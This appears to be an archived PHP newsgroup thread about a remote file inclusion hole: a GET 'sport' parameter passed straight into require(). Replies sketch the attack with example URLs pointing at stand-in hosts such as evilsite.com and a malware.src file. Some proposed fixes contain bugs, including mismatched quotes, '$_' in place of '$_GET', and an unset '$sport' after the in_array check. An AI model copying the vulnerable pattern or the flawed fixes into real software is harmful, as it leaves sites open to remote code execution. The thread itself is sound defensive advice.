Hello,
I do not know anything about PHP but thrown into this mix. I was told
by my ISP that there is vulnerability in following code to allow
spammer load an offsite php script for mailing. The defective code is:


if (isset($HTTP_GET_VARS['sport']))
{
$sport = $HTTP_GET_VARS['sport'];
require ($sport.".php");
}


how od i fix it?

If i am in wrong group please forgive me.

thanks
sa

My guess is that all a scammer would need to do would be to pass a
script in the url that would point to something on another server
malicious.

So for example say your site is mysite.com and the name of this script
is mailscript.php

I could navigate to your site as

http://www.mysite.com/mailscript.php...com/evilscript

Your script would thent ake that whole string
"www.evilsite.com/evilscript" append.php and include it. (the .s and /
would need to be converted to % notation first but same idea).

Fixing it would require you to submit the variable in post, although im
not too sure if thats 100%.


SA SA wrote:

Quote:

Hello,
I do not know anything about PHP but thrown into this mix. I was told
by my ISP that there is vulnerability in following code to allow
spammer load an offsite php script for mailing. The defective code is:
>
>
if (isset($HTTP_GET_VARS['sport']))
{
$sport = $HTTP_GET_VARS['sport'];
require ($sport.".php");
}
>
>
how od i fix it?
>
If i am in wrong group please forgive me.
>
thanks
sa

SA SA wrote:

Quote:

if (isset($HTTP_GET_VARS['sport']))
{
$sport = $HTTP_GET_VARS['sport'];
require ($sport.".php");
}
>
>
how do i fix it?

PHP security rule number 1: Never ever trust anything that comes from the
user.

In this case, the 'sport' GET variable can be crafted to inject code (other
posts in this thread indicate how).

There are several techniques to avoid this. One is to make sure that the
file you are about to include() (or require(), for that matter) is a local
file. See the PHP manual for functions on that issue.

Other technique, my favourite, is to manually check the possible values of
the received variable. It goes something like this:

if (isset($_GET['sport']))
{
$sport = $_['sport'];

if ($sport == 'football')
require ('football.php');
elseif ($sport == 'tennis')
require ('tennis.php');
elseif ($sport == 'skydiving')
require ('skydiving.php');
else
{
trigger_error(E_USER_ERROR,'Wrong sport, dude!");
die(); // Just in case trigger_error() doesn't stop execution
}
}



In any case, in any PHP app, if the user enters a "strange" value, or an
invalid value for a variable, the safest way to go is to throw an error and
abort execution.

Check that entered numbers are really numbers (or cast 'em to an int type
variable), that strings in a possible set of values are really in that set
of values, and that arbitrary strings to be inserted into a database are
escaped properly.


--
----------------------------------
Iván Sánchez Ortega -ivansanchez-algarroba-escomposlinux-punto-org-

Mmmmmmmmmmmmmmmmmmmmm.....cuannnnntttasssss emesssssss.

Quote:

I do not know anything about PHP but thrown into this mix. I was told
by my ISP that there is vulnerability in following code to allow
spammer load an offsite php script for mailing. The defective code is:

Quote:

if (isset($HTTP_GET_VARS['sport']))
{
$sport = $HTTP_GET_VARS['sport'];
require ($sport.".php");
}

$allowable_sports= array("football", "rugby", "tennis");

if (isset($HTTP_GET_VARS['sport']) && in_array($HTTP_GET_VARS['sport'],
$allowable_sports) )
{ require ($sport.".php"); }
else
{ require ("no_sport_just_sofa.php"); }

I will give it a try. Basically, we have a link for each sport that
passes the variable to sports.php based on the sport the sports.php
displays news releases.

suresh

http://www.domain.org/sports.php?sport=m_football
http://www.domain.org/sports.php?sport=m_softball
http://www.domain.org/sports.php?sport=m_soccr









P Pulkkinen wrote:

Quote:

Quote:

>

Quote:

>
$allowable_sports= array("football", "rugby", "tennis");
>
if (isset($HTTP_GET_VARS['sport']) && in_array($HTTP_GET_VARS['sport'],
$allowable_sports) )
{ require ($sport.".php"); }
else
{ require ("no_sport_just_sofa.php"); }

SA SA wrote:

Quote:

I will give it a try. Basically, we have a link for each sport that
passes the variable to sports.php based on the sport the sports.php
displays news releases.
>
suresh
>
http://www.domain.org/sports.php?sport=m_football
http://www.domain.org/sports.php?sport=m_softball
http://www.domain.org/sports.php?sport=m_soccr
>
>
>
>
>
>
>
>
>
P Pulkkinen wrote:
>

Quote:

>
>

I would use a drop-down where the value passed is
football value= s1,
tennis value = s2,
tiddlywinks=s3,etc...

look at the CASE funtionality.

then in my php script associate s1 to INCLUDE vfootball.php such that the
enduser cannot guess your file structures etc... the more they know about your
structures, the more likely it will be that they will find a vulnerability. And
the vfootball.php should be outside the web directories but readable, and not
writeable by the web server owner.

--
Michael Austin
Database Consultant
Domain Registration and Linux/Windows Web Hosting Reseller
http://www.spacelots.com

SA SA wrote:

Quote:

Hello,
I do not know anything about PHP but thrown into this mix. I was told
by my ISP that there is vulnerability in following code to allow
spammer load an offsite php script for mailing.

There are 2 very odd things about this:

1) that you have an ISP who is willing to take the time to read your code
(interesting, and a big plus)

2) that your host is not configured to prevent this (a bit worrying,
depending on the reason for 1).

To exploit this, someone just has to enter a URL like:

http://www.sasas-site.com/code.php?s...%2Fmalware.src

to get there code into your ISPs webserver.

Quote:

how od i fix it?
>

Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
values.

C.

Sorry to be an ignorant but should not "P Pulkkinen" 's solution work?
Please advise if am overlooking something.

Hosting company i am using hosts should plug the hole but if the code
itself is buggy then i don't blame them.

<-------------

$allowable_sports= array("football", "rugby", "tennis");

if (isset($HTTP_GET_VARS['sport']) &&
in_array($HTTP_GET_VARS['sport'],
$allowable_sports) )
{ require ($sport.".php"); }
else
{ require ("error.php"); }

---------------->



Colin McKinnon wrote:

Quote:

SA SA wrote:
>

Quote:

>
There are 2 very odd things about this:
>
1) that you have an ISP who is willing to take the time to read your code
(interesting, and a big plus)
>
2) that your host is not configured to prevent this (a bit worrying,
depending on the reason for 1).
>
To exploit this, someone just has to enter a URL like:
>
http://www.sasas-site.com/code.php?s...%2Fmalware.src
>
to get there code into your ISPs webserver.
>

Quote:

>
Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
values.
>
C.